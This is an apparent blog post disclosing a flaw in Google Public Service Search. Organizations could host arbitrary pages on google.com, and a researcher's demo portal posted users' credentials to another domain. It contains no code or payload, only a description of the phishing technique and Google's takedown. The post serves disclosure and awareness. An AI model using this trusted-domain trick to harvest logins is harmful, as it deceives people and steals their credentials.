Google Public Search service
Note: I had been holding back on this entry, but since this flaw has gone public elsewhere, I suppose it's okay to post again.http://www.google.com/u/gplus
If you go to this website, it claims to give you access to a new Google Plus service. Don't believe it (go ahead and try it though).Google Public Service Search allows universities and non-profit organizations to create a custom search portal that seems to be hosted on Google's server. The page is arbitrary (made by the organization) and can thus contain forms that post to *any* server on the Web.
Eric Farraro has taken advantage of lax filtering of
how organizations get to use the service, and has put up a search portal that appears to be a Google service. The form, however, submits to another domain and deceptively takes a person's credentials too. When I visited the site, it appeared like I was logging into a google service (since it's the google.com domain), but end up at a different site entirely.
People trust google.com to be Google, and not someone else. This case shows how someone can use the google.com domain but completely redirect unsuspecting people to another site.
Links:
Link to discovery (and details)Comments on DiggGoogle Public Search services(Thanks,
Steve!)
UPDATE (15-Aug 4:05pm): Google has taken down the demo and replaced it with a 403: forbidden error. Screenshots are on
Eric Farraro's site.
